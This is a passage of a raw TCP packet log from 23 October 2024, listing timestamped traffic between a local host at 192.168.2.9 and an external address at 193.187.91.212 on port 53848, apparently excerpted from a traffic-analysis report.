                                                                                                    Oct 23, 2024 17:25:25.174140930 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.174155951 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.174200058 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.310450077 CEST4997853848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:25.315840006 CEST5384849978193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.693581104 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.732096910 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:25.733719110 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:25.737610102 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.737648964 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.737694025 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.737704039 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.737768888 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.737855911 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.737865925 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.737909079 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.738039017 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.738050938 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.738115072 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.738214970 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.738225937 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.738245010 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.739111900 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.739181042 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.739300966 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.739310980 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.739509106 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.863012075 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.950711012 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:25.984561920 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:25.986871958 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:25.989175081 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:25.990513086 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.990530968 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.990545034 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.990555048 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.990631104 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.990720987 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.990731955 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.990741968 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.990753889 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.990762949 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.990820885 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.990922928 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.990932941 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.990942001 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.991600990 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:25.992289066 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.992377996 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.992499113 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.992510080 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.992553949 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.992564917 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.993294954 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:25.994663954 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.994775057 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.994802952 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.994821072 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.994847059 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.996987104 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.997178078 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.997217894 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.997342110 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.997351885 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.997395992 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.998668909 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.998723984 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.998735905 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.998929024 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:25.998940945 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.169749022 CEST4997853848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:26.175240040 CEST5384849978193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.554971933 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.594563961 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:26.596532106 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:26.600092888 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.600110054 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.600131035 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.600141048 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.600151062 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.600159883 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.600244999 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.600255013 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.600298882 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.600604057 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.600614071 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.600783110 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.600791931 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.600796938 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.602193117 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.602202892 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.602211952 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.602279902 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.736093044 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.876914978 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:26.879347086 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:26.881846905 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:26.882451057 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.882464886 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.882474899 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.882483959 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.882503986 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.882513046 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.882522106 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.882530928 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.882580996 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.882915974 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.882925034 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.882936954 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.882946968 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.882956982 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.884151936 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:26.885814905 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:26.894526958 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.894540071 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.898030043 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:26.997788906 CEST4997853848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:27.004307032 CEST5384849978193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.348355055 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.450663090 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:27.483231068 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:27.485343933 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:27.487622023 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:27.488658905 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.488686085 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.488694906 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.488713026 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.488722086 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.488730907 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.488878965 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.488923073 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.488986969 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.488996029 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.489000082 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.489011049 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.489020109 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.489038944 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.490138054 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:27.490778923 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.490842104 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.490937948 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.491020918 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.491030931 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.491041899 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.491163969 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.491672993 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:27.493010044 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.493113041 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.493164062 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.493222952 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.493269920 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.493336916 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.495573997 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.495845079 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.495899916 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.496009111 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.496018887 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.497091055 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.497143984 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.497153044 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.497219086 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.497236967 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.521859884 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.564604998 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:27.564652920 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:27.566288948 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:27.570128918 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.570147038 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.570168972 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.570179939 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.570190907 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.570210934 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.570254087 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.570266008 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.570308924 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.570318937 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.570327997 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.570341110 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.570360899 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.570555925 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.571687937 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.571759939 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.571774006 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.571785927 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.571863890 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.571873903 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.794733047 CEST4997853848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:27.800060034 CEST5384849978193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:27.934643030 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.097151041 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:28.099447012 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:28.101782084 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:28.104182005 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:28.109433889 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:28.153779030 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:28.198364019 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.198529959 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.198540926 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.198549986 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.198559999 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.198569059 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.198579073 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.198683977 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.198693991 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.198702097 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.198710918 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.198721886 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.198740005 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.198749065 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.198792934 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.198802948 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.198811054 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.198848009 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.198858023 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.198908091 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.199054956 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.199064970 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.199074984 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.199166059 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.199176073 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.199184895 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.199258089 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.199268103 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.199331999 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.199341059 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.199350119 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.199388027 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.199398041 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.199407101 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.199434042 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.199444056 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.199520111 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.199529886 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.199568033 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.263148069 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:28.316287994 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:28.318304062 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:28.321759939 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.321780920 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.321805000 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.321814060 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.321824074 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.321835995 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.321845055 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.321927071 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.321935892 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.321947098 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.321955919 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.321968079 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.322240114 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.322382927 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.323784113 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.323793888 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.323892117 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.323903084 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.323959112 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.324189901 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:28.563112974 CEST4997853848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:28.568532944 CEST5384849978193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.034758091 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.038441896 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.075428963 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:29.075474977 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:29.077400923 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:29.080899000 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.080919027 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.080939054 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.080948114 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.080957890 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.080961943 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.081032038 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.081041098 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.081049919 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.081070900 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.081079960 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.081089973 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.081099987 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.081109047 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.082791090 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.082803011 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.082874060 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.083198071 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.153848886 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:29.171164989 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:29.173142910 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:29.175323009 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:29.176709890 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.176734924 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.176745892 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.176758051 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.176826954 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.176837921 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.176848888 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.176942110 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.176951885 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.176961899 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.176973104 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.176981926 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.177037001 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.177320004 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.177506924 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:29.178694010 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.178704977 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.178761959 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.178781033 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.178791046 CEST5384849980193.187.91.212192.168.2.9
